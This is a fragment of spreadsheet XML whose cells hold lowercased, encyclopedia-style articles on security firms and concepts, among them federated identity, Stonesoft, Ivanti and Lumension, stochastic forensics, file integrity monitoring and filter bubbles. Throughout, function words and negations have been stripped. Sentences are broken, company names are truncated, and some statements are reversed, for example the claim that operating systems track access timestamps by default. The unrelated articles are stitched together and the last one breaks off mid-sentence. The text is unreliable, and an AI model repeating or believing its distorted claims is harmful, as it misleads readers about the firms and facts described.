    <t>federated identity information technology means linking person's electronic identity attributes, stored across multiple distinct identity management systems.federated identity related single sign-on (sso), user's single authentication ticket, token, trusted across multiple systems even organizations. subset federated identity management, relates authentication understood level technical interoperability would possible without sort federation. management information technology (it), federated identity management (fidm) amounts common policies, practices protocols place manage identity trust users devices across organizations.single sign-on (sso) systems allow single user authentication process across multiple systems even organizations. subset federated identity management, relates authentication technical interoperability. centralized identity management solutions created help deal user data security user systems accessed within network least "domain control". increasingly however, users accessing external systems fundamentally outside domain control, external users accessing internal systems. increasingly common separation user systems requiring access inevitable by-product decentralization brought integration internet every aspect personal business life. evolving identity management challenges, especially challenges associated cross-company, cross-domain access, given rise approach identity management, known "federated identity management". fidm, "federation" identity, describes technologies, standards use-cases serve enable portability identity information across otherwise autonomous security domains. ultimate goal identity federation enable users domain securely access data systems another domain seamlessly, without need completely redundant user administration. identity federation comes many flavors, including "user-controlled" "user-centric" scenarios, well enterprise-controlled business-to-business scenarios. federation enabled open industry standards and/or openly published specifications, multiple parties achieve interoperability common use-cases. typical use-cases involve things cross-domain, web-based single sign-on, cross-domain user account provisioning, cross-domain entitlement management cross-domain user attribute exchange. identity federation standards reduce cost eliminating need scale one-off proprietary solutions. increase security lower risk enabling organization identify authenticate user once, identity information across multiple systems, including external partner websites. improve privacy compliance allowing user control information shared, limiting amount information shared. lastly, drastically improve end-user experience eliminating need account registration automatic "federated provisioning" need redundantly login cross-domain single sign-on. notion identity federation extremely broad, also evolving. could involve user-to-user user-to-application well application-to-application use-case scenarios browser tier well services service-oriented architecture (soa) tier. involve high-trust, high-security scenarios well low-trust, low-security scenarios. levels identity assurance required given scenario also standardized common open identity assurance framework. involve user-centric use-cases, well enterprise-centric use-cases. term "identity federation" design generic term, bound specific protocol, technology, implementation company. identity federations bi-lateral relationships multilateral relationships. latter case multilateral federation frequently occurs vertical market, enforcement (such national identity exchange federation nief) research education (such incommon). identity federation bilateral, parties exchange necessary metadata (assertion signing keys, etc.) implement relationship. multilateral federation, metadata exchange among participants complex issue. handled hub-and-spoke exchange distribution metadata aggregate federated operator. thing consistent, however, fact "federation" describes methods identity portability achieved open, often standards-based manner meaning anyone adhering open specification standard achieve full spectrum use-cases interoperability. identity federation accomplished number ways, involve formal internet standards, oasis security assertion markup language (saml) specification, involve open-source technologies and/or openly published specifications (e.g. information cards, openid, higgins trust framework novell's bandit project). technologies technologies used federated identity include saml (security assertion markup language), oauth, openid, security tokens (simple tokens, json tokens, saml assertions), service specifications, windows identity foundation. government initiatives united states united states, national institute standards technology (nist), national cybersecurity center excellence, taken interest topic, participating emerging standards participating research.the federal risk authorization management program (fedramp) government-wide program provides standardized approach security assessment, authorization, continuous monitoring cloud products services. fedramp enables agencies rapidly adapt old, insecure legacy mission-enabling, secure, cost effective cloud-based examples digital identity platforms allow users onto third-party websites, applications, mobile devices gaming systems existing identity, i.e. enable social login, include: microsoft account formerly windows live google account facebook login public social venues. yahoo! users yahoo! onto sites, users used possibility onto yahoo! google facebook ids. twitter linkedin paypal foursquare myspace mozilla persona november 2016, mozilla shut persona.org services amazon githubnote: facebook connect delegated federated also account pre-hijacking claims-based identity digital identity self-sovereign identity references</t>
  </si>
  <si>
    <t>Storage Networking Certification Program</t>
  </si>
  <si>
    <t>storage networking industry association (snia) registered 501(c)(6) non-profit trade association incorporated december 1997. snia unique members, 2,000 active contributing members 50,000 users storage professionals. snia absorbed small form factor committee. snia's membership community participates following storage-related technical working groups: certification cloud storage technologies computational storage data management data security dictionary networked storage next generation data center persistent memory physical storage power efficiency measurement storage management initiative specification (smi-s) storage management swordfish protocolsnia technical council maintain vendor-neutral dictionary glossary storage networking, data, information management terminology. snia dictionary award publication excellence 2009 2012 business communications report.snia along computerworld hosted popular storage networking world (snw) conferences 1999 2013, various venues around world, commonly occurred spring fall usa, fall snia also organizer storage developers conference (sdc) manages vendor-neutral technology center colorado springs, colorado.snia also maintains partnerships submits material industry standards organizations iso, iec, dmtf, cxl, incits t10, t11, ietf, ieee, storage networking certification program storage networking certification program (sncp) administered snia. according snia website, program: "establishes uniform standard storage networking industry individual knowledge skill sets verified. program provides strong foundation vendor-neutral, systems level credentials integrate complement individual vendor certifications."the following certification credentials available sncp: scsp: snia certified storage professional scse: snia certified storage engineer scsa: snia certified storage architect scsn-e: snia certified storage networking expert (requires additional vendor credential) references external links official website</t>
  </si>
  <si>
    <t>M86 Security</t>
  </si>
  <si>
    <t>security privately owned internet threat protection company specialized email security products content filtering appliances. company's international headquarters located basingstoke, development centers located california, israel zealand. history 1995-2008 founded 1995, company changed name technologies 2000. co-founder years, george shih, developed many technologies used internet filtering products.originally, effort provide “pornography-free internet children”, company offered filtering software computers used education environments. later, technologies developed products manage internet access markets.in 2002, paul myer joined company president coo, joining george shih grow company expanded channels marketing. https://www.crn.com/news/security/192201623/8e6-technologies-takes-direct-approach-to-channel.htm company's internet filtering, reporting monitoring appliances named “best buy” magazine 2007 2008.in november 2008, technologies marshal limited, provider email security products, merged became marshal8e6. george shih remained interim former finjan ceo, john vigouroux, named position april 2009. 2008-current november 2008, technologies, company sold filtering products, marshal software, provider integrated email security products, merged form marshal8e6.in march 2009, marshal8e6 acquired avinti, along behavior-based malware technology detecting blended threats occur email. upon completion merger, avinti's ceo, william kilmer, joined marshal8e6 chief marketing officer.as part rebranding campaign, marshal8e6 changed name security september 2009. following november, security acquired finjan software along secure gateway (formerly finjan vital security) product licenses patents real-time code analysis technology, giving company malware detection prevention capabilities gateway. company previously announced john vigouroux, finjan software, security.marshal's trace labs finjan's malicious code research center combined form security labs, researches reports email-based security threats. august 2010, ranked number 1,230 inc. 5000 annual listing fastest private growing companies america.on march 2012 announced chicago based trustwave holdings would acquire security. march 2012 trustwave completed acquisition security subsequently rebranded products operations trustwave name. references</t>
  </si>
  <si>
    <t>Stonesoft Corporation</t>
  </si>
  <si>
    <t>stonesoft corporation public company developed sold network security solutions based helsinki, finland. publicly owned 2013 acquired intel's subsidiary mcafee.stonesoft business globally, regional headquarters atlanta, georgia, united states, sales offices throughout europe, middle east, china. july, 2013 mcafee, part intel security, completed tender offer acquire stonesoft products technologies. stonesoft became part mcafee network security business unit. stonesoft firewall products renamed mcafee next generation firewall. mcafee sold stonesoft forcepoint january 2016. history stonesoft started systems integrator nordic regions europe. 1994 introduced stonebeat, technology creating high availability pair firewalls active-passive configuration. 1999, company extended stonebeat patented load balancing clustering technology, launching stonebeat fullcluster. first technologies certified check point's opsec program.in 2001, stonesoft expanded product firewall/vpn space, becoming direct competitor check point. stonegate firewall/vpn launched march 2001. january 2003, company introduced first virtual firewall/vpn solution, mainframes.in 2010, company released information cert-fi advanced evasion technique (aets) skepticism community. further aets released 2011, eventually verified independent labs researchers.in 2012 “stonesoft” replaced “stonegate” product name. from stonesoft used company product name. stonesoft corporation's product sales 2012 circa million euros. product sales grew approximately 18%. sales approximately 9.2–9.3 million euros, equals growth by14-16%. growth lower expected. products product portfolio includes firewall/vpn devices, (intrusion detection prevention systems), systems, available hardware appliances, software, vmware-certified virtual appliances.each components, well third-party devices, managed stonesoft management center. product portfolio differentiates unique clustering load balancing technologies based company's older stonebeat technology, originally developed check point firewall-1. stonesoft's current product portfolio divided five major categories: stonesoft firewall/vpn stonesoft ids/ips stonesoft stonesoft management center (smc) stonesoft virtualization solutionsthe stonesoft firewall/vpn placed gartner's magic quadrant enterprise network firewalls several years, currently placed niche quadrant. gartner notes stonesoft "serves placements well usually, high availability leaders otherwise welcome". stonesoft firewall/vpn regarded "robust performance feature relative company resources, loyal customer base".the stonesoft also placed gartner's magic quadrant network intrusion prevention, currently “visionaries” quadrant. also certified icsa labs network intrusion prevention detection category, four vendors consortium achieve certification. stonesoft also received favorable reviews labs next generation firewall capability (2012) intrusion detection prevention system. controversy 2008, helsinki court appeal issued decision case brought stonesoft several members management team. court "held members company's board directors former gross negligence failed give profit warning time". issue hand discrepancies profitability forecasted company's year 2000 interim reports actual state company time. reports indicated company sound profitable, profit warning fact issued". district court helsinki originally dismissed claims decision november 2006. advanced evasion techniques 2010 stonesoft informed public evasion technique bypass security defences. stonesoft defines advanced evasion techniques (aets) ”virtually limitless quantity unrecognizable conventional detection methods. they work levels tcp/ip stack work across many protocols protocol combinations.” according nyman, stonesoft corporation's senior marketing manager, aets deliver malicious code without detection without leaving trace.on july 2012 stonesoft released free tool enables organisations test network security. references external links official website semi-official community site advanced evasion techniques mcafee next generation firewall</t>
  </si>
  <si>
    <t>M2SYS Technology</t>
  </si>
  <si>
    <t>m2sys technology global bio-metric identification management company provides bio-metric identity management software hardware along enterprise software applications several vertical markets including; public safety, workforce management, point sale, healthcare, education, child care, transportation security, banking membership management. they offer software development kits software vendors want bio-metric identification applications directly users. name m2sys short “mind system” coined mizan rahman describe flow development ideas tangible, market-ready bio-metric recognition software engine ancillary products. history m2sys incorporated 2001 small software company developed supply chain software. company evolved technical innovation, later developed fingerprint bio-metric research development center invention bio-plugin.m2sys established headquarters atlanta, georgia continues operate. 2007, opened office asia located dhaka, bangladesh. 2013, opened another office south america located lima, peru. awards 2007, company received 2007 biometrics technology innovation year award frost sullivan.in summer 2010, m2sys released “hybrid biometric platform,” client/server bio-metric software system supports fingerprint, finger vein, palm vein, iris recognition.subsequently, 2011 company awarded 2011 north american product innovation award biometrics industry "hybrid biometric platform".in 2013, m2sys named technology association georgia (tag) innovative technology company.m2sys named 2014 most innovative companies georgia technology association georgia (tag).m2sys also received recognition 2014 global impact award winner international business leadership atlanta metro chamber commerce. strategic partnerships fujitsu april 2010, m2sys created alliance fujitsu frontech north america designed offer pc-based palm vein biometric recognition systems. under partnership, m2sys added support fujitsu palmsecure biometric identification system bio-plugin biometrics platform. this alliance terminated march 2015. kronos june 2009, m2sys established partnership kronos, design software interfaces kronos workforce timekeeper. hitachi m2sys established partnership hitachi 2008 deliver bio-plugin bio-metric identification software technology finger vein biometric scanner market deployment. products bio-plugin bio-plugin bio-metrics software program allows developers integrate server-based biometrics system. bio-snapon bio-snapon complete bio-metrics software system added (“snapped-on”) third party internally developed software package, without development work. hybrid biometric platform hybrid biometrics multi-modal bio-metrics system supports fingerprint, finger vein, palm vein, iris recognition single server. bio-hyperpliance bio-hyperpliance scalable multi-modal bio-metrics recognition system leverages distributed node balancing identification large databases. rightpunch rightpunch multi-modal pc-based “soft” clock data collection software used without bio-metrics. rightpatient rightpatient multi-modal bio-metric identification system designed identify patients healthcare help prevent misidentification fraud. abis software package used perform wide variety tasks processing, editing, searching, retrieving storing bio-metric templates subject records. certisid "know your customer" (kyc) bio-metric customer identification application help prevention identity theft, financial fraud, money laundering, terrorist financing. m2-fuseid (hardware) late 2013, m2sys designed released m2-fuseid "smart" multi-modal finger reader simultaneously captures fingerprint image finger vein pattern simultaneously single touch finger. references</t>
  </si>
  <si>
    <t>Fichet-Bauche</t>
  </si>
  <si>
    <t>fichet-bauche brand safes vaults origins france. specialises products offer certified burglary protection and/or fire protection. brand widely sold marketed france, spain, portugal, italy french speaking parts africa. fichet-bauche brand owned gunnebo security group. history fichet company born february 1799 etrepilly, france, alexandre fichet opened locksmiths paris 1825 registered first patent 1829 safety lock patents followed 1834 1836. shortly after, fichet small workshop paris began expanding manufacture safes. 1840, made first modern fire safe made entirely steel using renowned, fichet lock key. production outgrew workshop, fichet built factory monceau paris, followed second lyon third marseille. fichet died 1862 business changed hands frequently loius apolline bonnet, monsieur charlier, manager workshops, businessmen, monsieur guénot monsieur pinot. 1879, fichet company built first bank vault room rentable safe deposit lockers. factories opened other, notably oust-marest somme region security locks manufactured. this factory supported nearby “fichet village” factory creil made bank safes. world general partnership fichet became limited partnership, came management jacques bournisien marcel beau. factory sens 1917 years later branches opened around world, including italy, argentina, spain, belgium, romania brazil. company able expand clients’ security installed first industrial alarm surveillance network 1926. world bournisien died, leaving beau company. aided time monsieur nadaud, husband alexandre fichet’s great great granddaughter. bauche company 1864, auguste-nicolas bauche, expert fire resistant materials, began produce safes founded first production factory gueux, near reims france. 1867, gueux workshops become cramped. factory moved reims modern workshops incorporating technological breakthrough time: cementation furnace extreme hardening surface certain steels. this great advancements protection safes could offer. 1879, bauche demonstrated efficacy fire safes live demonstration several thousand francs emerged intact safe repeatedly subjected fire. then invention "ironclad" safe, fire resistant armour plated, 1895 really made bauche's name.bauche expanded creation factory feuquières. start world 1914, factory fell hands germans who, retreat 1918, razed building ground. afterwards, ruins rebuilt production research started afresh. 1924, bauche created anti welding torch testing, focus technology would used many years come. working national defence ministry, factory destroyed germans 1940 four years later partially reconstructed repair workshop american tanks. company wait well factory fully rebuilt. creation fichet-bauche 1967, fichet bauche merged. newly christened fichet-bauche company focused safes, safe deposit lockers, vaults locks. corporate headquarters transferred clamart vélizy and, parallel, factory built carignan production fire resistant safes. fichet-bauche group also expanded internationally 1960s 1970s. factory designed manufacture vault room doors safes built barcelona, offices opened argentina, brazil, portugal, malaysia hong kong. gunnebo security group december 1999, fichet-bauche acquired gunnebo security group. with factory bazancourt, marne company remained name 2007, fully merged gunnebo, name became number gunnebo brands safes vaults. reception writing l'union ardennais, guillaume flatet commented fichet-bauche factory resisting economic crisis well safes resist burglars, describing visit rare glimpse quiet well performing business.safe specialist mike palmer, writing insurance surveyors.org, noted gunnebo acquired major brands including chubb well fichet bauche john tann, world's first safe maker; chubb fichet bauche surviving brands, john tann's name disappearing, comment "how mighty fallen...".monocle magazine described gunnebo "key holdings" including "french locksmith giant fichet-bauche". references external links official website</t>
  </si>
  <si>
    <t>Fifth Dimension Operations</t>
  </si>
  <si>
    <t>fifth dimension warfare complements four classical dimensions: land, sea, air, space. enunciated 1995 information operations. core u.s. military doctrine this part core u.s. military doctrine, recognizes least five dimensions, 'domains warfare' responsible: land space informationthe origin concept fifth dimension operations criticism 'domain approach' reflected failure think beyond normal "four" dimensions threats, domestic international". expansion concept recent times, concept fifth dimensional operations, concept military operations, taken wider scope original information operations background, focusing "the advanced space-time manipulating capabilities cyberspace offers". this development begun early 1996, regards advanced battlespace cybermaneuver concepts. historical analysis historical analysis used justify concept fifth dimensional operations developed notion that: land warfare defined first human energy (infantry) animal energy (cavalry) three-dimensional medieval era, mechanical energy four-dimensional modern era. "battlespace historically defined three spatial dimensions temporal dimension {t}". missing element fifth dimension cyberspace, defined "impact internet stealth-masked terrorist advanced battlefield". 1995–1996 critique information operations fifth domain approach core arguments used development concept fifth dimension operations been: view five dimensions/domains land, sea, air, space information viewed compartmentalized elements. battlespace needs seen integrated whole, operations carried multiple fronts, continuum interrelated activities."there technological solution approach makes possible feat entering opponent's decision making loop imaginative information technology. sense, contribution conceptually presupposes move information possibilities realized ability enter mind opponent becomes reality, merely guessing motives actions, molding directing well." merging multidimensional battlespace concept five-dimensional operational space based notion structural dimension modern-day tactics operational art, developed challenge posed information command control (c2) technology, well command influence (ci). decentralized swarming, irregular opponents. linguistic shift "battleground" "battlespace" recognizes current reality forces operating multidimensional battleground complex opponents. relationship three-dimensional (3d) tactics analysis concept fifth dimension operations conceptually based adding "five-dimensional, holistic approach warfare uses three dimensions land, sea, aerospace also incorporates temporal cyber dimensions warfare". cyberwarfare/cyber-attack core technical component fifth dimension operations cyberwarfare, cyber-attacks. information warfare information warfare historically concept, tended developed u.s. military doctrine, tends favour technology, tends extend realms electronic warfare, cyber warfare, information assurance computer network operations/attack/defense. concurrently, broader term information operations developed combining making technology, well focusing human-related aspects information use, including social network analysis, decision analysis human aspects command control. this broader view become basis fifth dimension operations. references</t>
  </si>
  <si>
    <t>Firecracker (software)</t>
  </si>
  <si>
    <t>firecracker virtualization software developed amazon services. makes kvm. references external links official website</t>
  </si>
  <si>
    <t>Stochastic forensics</t>
  </si>
  <si>
    <t>stochastic forensics method forensically reconstruct digital activity lacking artifacts, analyzing emergent properties resulting stochastic nature modern computers. unlike traditional computer forensics, relies digital artifacts, stochastic forensics require artifacts therefore recreate activity would otherwise invisible. chief application investigation insider data theft. history stochastic forensics invented 2010 computer scientist jonathan grier detect investigate insider data theft. insider data theft notoriously difficult investigate using traditional methods, since create artifacts (such changes file attributes windows registry). consequently, industry demanded investigative technique.since invention, stochastic forensics used real world investigation insider data theft, subject academic research, industry demand tools training. origins statistical mechanics stochastic forensics inspired statistical mechanics method used physics. classical newtonian mechanics calculates exact position momentum every particle system. this works well systems, solar system, consist small number objects. however, cannot used study things like gas, intractably large numbers molecules. statistical mechanics, however, attempt track properties individual particles, properties emerge statistically. hence, analyze complex systems without needing know exact position individual particles. can’t predict individual molecule move shake; accepting randomness describing mathematically, laws statistics accurately predict gas’s overall behavior. physics underwent paradigm shift late 1800s... could digital forensics need paradigm shift well? likewise, modern computer systems, {\displaystyle 2^{8^{10^{12}}}} states, complex completely analyzed. therefore, stochastic forensics views computers stochastic process, which, although unpredictable, well defined probabilistic properties. analyzing properties statistically, stochastic mechanics reconstruct activity took place, even activity create artifacts. investigating insider data theft stochastic forensics chief application detecting investigating insider data theft. insider data theft often done someone technically authorized access data, uses regularly part job. create artifacts change file attributes windows registry. consequently, unlike external computer attacks, which, nature, leave traces attack, insider data theft practically invisible.however, statistical distribution filesystems' metadata affected large scale copying. analyzing distribution, stochastic forensics able identify examine data theft. typical filesystems heavy tailed distribution file access. copying bulk disturbs pattern, consequently detectable.drawing this, stochastic mechanics used successfully investigate insider data theft techniques failed. typically, stochastic forensics identified data theft, follow using traditional forensic techniques required. criticism stochastic forensics criticized providing evidence indications data theft, concrete proof. indeed, requires practitioner "think like sherlock, aristotle." certain authorized activities besides data theft cause similar disturbances statistical distributions.furthermore, many operating systems track access timestamps default, making stochastic forensics directly applicable. research underway applying stochastic forensics operating systems well databases.additionally, current state, stochastic forensics requires trained forensic analyst apply evaluate. there calls development tools automate stochastic forensics guidance software others. references external links "detecting data theft using stochastic forensics", journal digital investigation "how digital forensics detects insider theft", information week "new forensics method insider thieves", dark reading</t>
  </si>
  <si>
    <t>File integrity monitoring</t>
  </si>
  <si>
    <t>file integrity monitoring (fim) internal control process performs validating integrity operating system application software files using verification method current file state known, good baseline. this comparison method often involves calculating known cryptographic checksum file's original baseline comparing calculated checksum current state file. other file attributes also used monitor integrity.generally, performing file integrity monitoring automated using internal controls application process. such monitoring performed randomly, defined polling interval, real-time. security objectives changes configurations, files file attributes across infrastructure common, hidden within large volume daily changes impact file configuration integrity. these changes also reduce security posture cases leading indicators breach progress. values monitored unexpected changes files configuration items include: credentials privileges security settings content core attributes size hash values configuration values compliance objectives multiple compliance objectives indicate file integrity monitoring requirement. several examples compliance objectives requirement file integrity monitoring include: payment card industry data security standard (requirement 11.5) sarbanes-oxley (section 404) nerc nerc standard (cip-010-2) fisma federal information security management (nist sp800-53 rev3) hipaa health insurance portability accountability 1996 (nist publication 800-66) sans critical security controls (control also procedures algorithms: checksum file verificationapplications, examples (where used) include: advanced intrusion detection environment another file integrity checker beyondtrust cimtrak cloudpassage kaspersky hybrid cloud security, embedded security, security linux, security windows server lockpath blacklight logrhythm mcafee change control netwrix-nnt change tracker ossec qualys samhain splunk system file checker (provided windows) tanium integrity monitor trend micro deep security tripwire products trustwave references</t>
  </si>
  <si>
    <t>Stellant Systems Inc.</t>
  </si>
  <si>
    <t>stellant systems inc. manufacturer microwave devices ground-based, airborne satellite communications radar. october 2021, stellant systems formed l3harris technologies' electron devices narda microwave-west divisions sold arlington capital partners, washington d.c. based private equity firm. company initially formed former electron devices division (edd) industrial electronics group hughes aircraft company, litton industries' electron division, acquired communications holdings, inc. later merged harris corporation 2019 form l3harris technologies followed shortly divisions' sale arlington 2021. stellant known traveling-wave tubes (twts), traveling-wave tube amplifiers (twtas), microwave power modules (mpms) electronic power conditioners (epcs) well xenon propulsion systems (xips). since inception, produced tens thousands twts. they u.s. supplier space-qualified twts twtas. history litton industries 1932, charlie litton started company redwood city, 1945 company, known litton industries, employees, working vacuum tubes. 1948, business grown half manufacturing equipment half tubes. after receiving contract magnetron designated 4j52, well follow-on contracts, company became major competitor raytheon profitable. 1953, charlie litton sold litton industries electro dynamics corporation, renamed adopt litton industries name. original litton industries, litton industries, electron tube division, grew rapidly. 1965, litton industries bought sylvania's plant williamsport, moved magnetron production there. 1975, litton industries bought ma-com tube operations, 1993 bought raytheon microwave power tube operations. during 1990s, litton developed tubes became second source hughes edd's airborne radar tubes. 2001, company purchased northrop grumman, becoming litton electron devices. short time later 2002, northrop sold litton communications, renamed electron devices. hughes microwave tube division early 1950s, hughes secured military contract xf-108 rapier interceptor's an/asg-18 fire control system radar. korean war, f-108 program canceled, howard hughes chose keep program going company money. 1959 hughes microwave tube division operating culver city, california. hughes developing twts suitable airborne radar, eventually contract f-14 radar system. time f-14 program went production, tube division outgrown culver city facility. hughes moved operation torrance, california, 1967, became electron dynamics division (edd) within industrial electronics group.general motors purchased hughes aircraft company 1985. boeing company purchased gm's satellite operation 2000, acquiring process, renamed boeing satellite systems, electron dynamic devices, maintaining initials edd. boeing sold communications, inc. 2005. already owned another company using initials edd, thereby prompting name change communications, electron technologies, inc. short. boeing sold property torrance rreef america reit corporation (rreef) october 2006. narda microwave-west narda, firm specialized microwave product industries, formed 1953 mineola, york. initially named nassau research development associates made three engineers, bill bourke, mcfarland, casper, writer businessman, john mcgregor. following year, changed name narda corp, changed narda microwave corp 1957. 1975, narda acquired anacom, inc. formed narda's pacific operations, later become narda west. narda acquired loral corporation 1983, acquired lockheed 1994. 1997, narda companies spun lockheed martin form communications, would later become technologies. electron devices technologies l3harris technologies) both electron devices electron technologies, inc. existed l3's umbrella combined 2017 electron devices. narda east narda west continued within technologies well, though narda microwaves-east combined miteq, firm acquired 2015, form narda-miteq. shortly thereafter, technologies harris corporation merged 2019 form l3harris technologies. stellant systems inc. stellant systems inc. came l3harris technologies sold electron devices narda microwave-west divisions arlington capital partners, private equity firm, early october 2021. under agreement, electron devices narda microwave-west would combine form stellant systems inc. become subsidiary arlington's. stellant reportedly maintain independence would headed leaders within companies' ranks. going forward, stellant would retain three facilities torrance, williamsport, folsom, references</t>
  </si>
  <si>
    <t>Sanctum (company)</t>
  </si>
  <si>
    <t>sanctum santa clara, california-based information technology company focused application security. sanctum offered firewall, appshield, scanner, appscan, application-layer security environments.in 2003 sanctum merged watchfire company subsequently acquired ibm. history sanctum founded 1997 perfecto technologies, eran reshef gili raanan. company released first product appshield summer 1999.the company done extensive research application security applying formal methods real life software collaboration turing award winner professor amir penueli. early research 1996 1997 invention, parallel teams, captcha technology, application patent captcha.in 2000 company renamed sanctum. company backed investors sequoia capital, intel capital, goldman sachs, dlj, walden mofet. products appshield product first product inspect incoming hypertext transfer protocol requests block malicious attacks based dynamic policy composed analyzing outgoing html pages.later june 2000 company introduced appscan world's first security vulnerability assessment solution. among first clients appscan yahoo!, bank america at&amp;t. references</t>
  </si>
  <si>
    <t>Lumkani</t>
  </si>
  <si>
    <t>lumkani social enterprise launched south african students deliver networked heat detector device decrease risks fire rural urban informal settlements. foundation background lumkani initially university project created francois petousis, electrical engineering student university cape town. petousis designed smoke detector. current lumkani system utilizes rate temperature change, original temperature detection system designed samuel ginsberg.in 2014, petousis team created lumkani startup along supervisor samuel ginsberg, sell heat detector device. name startup device origins local xhosa language, lumkani means careful”. device device small blue measure rate temperature rise rather detecting smoke helps reducing false alarms. network lumkani devices specific slum uses radio frequency send text messages notify people cases emergencies. alarm activated houses within metres (200 radius initial alarm disarmed within seconds.the central device network locates coordinates blaze, coordinate fire department immediate intervention. installation november 2014, lumkani distributed 7,000 devices south african slums. 2015, detectors installed 5000 households south africa's highest fire risk community cape town, south africa. start-up planning implement social impact bond several local governments provide device numerous households informal settlements small free. recognition funding 2014, startup received funding south africa’s technology innovation agency (tia).in year, startup global innovation science technology competition’s best start-up award.in 2015, startup’s device finalist katherine swanson young innovator award. year, lumkani people’s choice award global social venture competition.in 2020, lumkani horizon prize affordable high-tech humanitarian aid, research&amp;innovation days. expansion startup expanding activities african countries india. references external links lumkani.com</t>
  </si>
  <si>
    <t>Lumension Security</t>
  </si>
  <si>
    <t>ivanti software company headquartered south jordan, utah, united states. produces software security, service management, asset management, unified endpoint management, identity management supply chain management. formed january 2017 merger landesk heat software, later acquired cherwell software. history landesk systems founded 1985 software products acquired intel 1991 form landesk division. landesk introduced desktop management category 1993. 2002 landesk software became standalone company headquarters near salt lake city, utah. 2006, avocent purchased company $416 million. also 2006, landesk added process management technologies product line extended consolidated service desk market landesk service desk. 2010 landesk acquired private equity firm thoma bravo. landesk bought supply chain software company wavelink 2012, network vulnerability assessment patch management company shavlik 2013, application software company naurtech corporation 2014, data visualisation company xtraction solutions 2015. appsense, provider secure user environment management technology, 2016. lumension security lumension security, founded high tech software 1991 headquartered scottsdale, arizona company rebranded patchlink corporation 1999. 2016, patrick clawson appointed chairman, president company adopted lumension name 2007.in 2009 lumension acquired securityworks, 2012 acquired coretrace.through period, industry awards included: 2014, "lumension endpoint management security suite" "highly commended" best advanced persistent threat protection category magazine awards europe 2014. 2013, lumension received position "visionary" gartner's magic quadrant endpoint protection platforms. 2012, 2011 2010 lumension received position "visionary" gartner's magic quadrant endpoint protection platforms. 2011 "lumension power management" listed manitoba hydro commercial network energy management program. 2010 lumension named "leader" vulnerability management forrester wave report. 2010 "lumension risk manager" "highly commended" best security management category magazine awards europe 2010. 2008 frost sullivan awarded lumension global market penetration leadership award.lumension products traditionally competed endpoint management security industry sophos, mcafee, kaspersky lab, symantec trend micro among others. heat heat software producer software service management endpoint management formed 2015 merger frontrange solutions lumension security. ivanti january 2017 clearlake capital group, owner heat software, purchased landesk thoma bravo. january 2017, landesk heat software merged form ivanti. combined company 1800 employees countries markets products references original names wavelink supply chain software ivanti patch product ‘powered shavlik’. april 2017, ivanti acquired concorde solutions, based software asset management company. july 2017, ivanti acquired software, netherlands based company producing automation identity management software.in september 2020, ivanti entered agreement acquire based unified endpoint management company mobileiron $872 million jose, california based pulse secure, undisclosed terms. december 2020, ivanti announced acquisitions completed.on january 2021, ivanti announced intent acquire cherwell software. products ivanti package studio based liquit setup commander ivanti patch management security management applications sccm, third party applications, servers ivanti service manager itsm enterprise service management based heat's products asset management supply chain management based wavelink's products. endpoint manager based landesk ldms pulse connect secure, policy secure, workspace, pulse zero trust access based pulse secure's products controversies 2021 pulse connect secure hack april 2021, cybersecurity firm fireeye reported hackers suspected chinese ties exploited pulse secure break government agencies, defense companies financial institutions europe report detailed hackers repeatedly took advantage several known novel flaw pulse secure gain access dozens organizations defense industrial sector. department homeland security confirmed intrusions public advisory, urging network administrators scan signs compromise. ivanti published emergency workaround urged network admins install. cybersecurity infrastructure security agency ordered federal civilian agencies take several steps reduce risk suspected breach. fireeye reported intrusions using vulnerabilities began early august 2020, conducted suspected ties chinese government. there similarities hack intrusions 2014 2015 conducted chinese espionage actor named apt5. after examination, cisa discovered least federal agencies breached, among agencies pulse connect secure products. references</t>
  </si>
  <si>
    <t>Filter bubble</t>
  </si>
  <si>
    <t>filter bubble ideological frame state intellectual isolation result personalized searches website algorithm selectively guesses information user would like based information user, location, past click-behavior search history. result, users become separated information disagrees viewpoints, effectively isolating cultural ideological bubbles. choices made algorithms always transparent. prime examples include google personalized search results facebook's personalized news-stream. term filter bubble coined internet activist pariser circa 2010 discussed 2011 book name. bubble effect negative implications civic discourse, according pariser, contrasting views regard effect minimal addressable. results u.s. presidential election 2016 associated influence social media platforms twitter facebook, result called question effects "filter bubble" phenomenon user exposure fake news echo chambers, spurring interest term, many concerned phenomenon harm democracy well-being making effects misinformation worse. (technology social media) “lets like-minded people, mixing sharing understanding points view it's super important. it's turned problem many others, would expected.” concept according pariser, users less exposure conflicting viewpoints isolated intellectually informational bubble. related example user searched google "bp" investment news british petroleum, another searcher information deepwater horizon spill, noted search results pages "strikingly different".pariser defined concept filter bubble formal terms "that personal ecosystem information that's catered algorithms". internet user's past browsing search history built time indicate interest topics "clicking links, viewing friends, putting movies [their] queue, reading news stories", forth. internet firm uses information target advertising user, make certain types information appear prominently search results pages.this process random, operates three-step process, pariser, states, "first, figure people like. then, provide content services best them. finally, tune right. your identity shapes media." pariser also reports: according wall street journal study, fifty internet sites, yahoo msn, install average data-laden cookies personal tracking beacons each. search word like "depression" dictionary.com, site installs tracking cookies beacons computer sites target antidepressants. share article cooking news, chased around teflon-coated pots. open—even instant—a page listing signs spouse cheating prepare haunted paternity-test ads. accessing data link clicks displayed site traffic measurements determine filter bubbles collective individual.as 2011, engineer told pariser google looked different pieces data personally tailor user's search results, including non-cookie data type computer used user's physical location.other terms used describe phenomenon, including "ideological frames" "the figurative sphere surrounding search internet". related term, "echo chamber", originally applied news media, applied social media well.pariser's idea filter bubble popularized talk gave 2011, gives examples filter bubbles work seen. test seeking demonstrate filter bubble effect, pariser asked several friends search word "egypt" google send results. comparing friends' first pages results, overlap topics like news travel, friend's results prominently included links information then-ongoing egyptian revolution 2011, friend's first page results include links.in filter bubble, pariser warns potential downside filtered searching "closes ideas, subjects, important information", "creates impression narrow self-interest exists". view, filter bubbles potentially harmful individuals society. criticized google facebook offering users "too much candy, enough carrots". warned "invisible algorithmic editing web" limit exposure information narrow outlook. according pariser, detrimental effects filter bubbles include harm general society sense possibility "undermining civic discourse" making people vulnerable "propaganda manipulation". wrote: world constructed familiar world there's nothing learn (since invisible autopropaganda, indoctrinating ideas. many people unaware filter bubbles even exist. this seen article guardian, mentioned fact "more facebook users entirely unaware curation facebook all, believing instead every single story friends followed pages appeared news feed." brief explanation facebook decides goes user's news feed algorithm takes account "how interacted similar posts past."a filter bubble described exacerbating phenomenon called splinternet cyberbalkanization, happens internet becomes divided sub-groups like-minded people become insulated within online community fail exposure different views. this concern dates back early days publicly accessible internet, term "cyberbalkanization" coined 1996. similar concepts news media, echo chamber metaphorical description situation beliefs amplified reinforced communication repetition inside closed system. visiting "echo chamber", people able seek information reinforces existing views, potentially unconscious exercise confirmation bias. this increase political 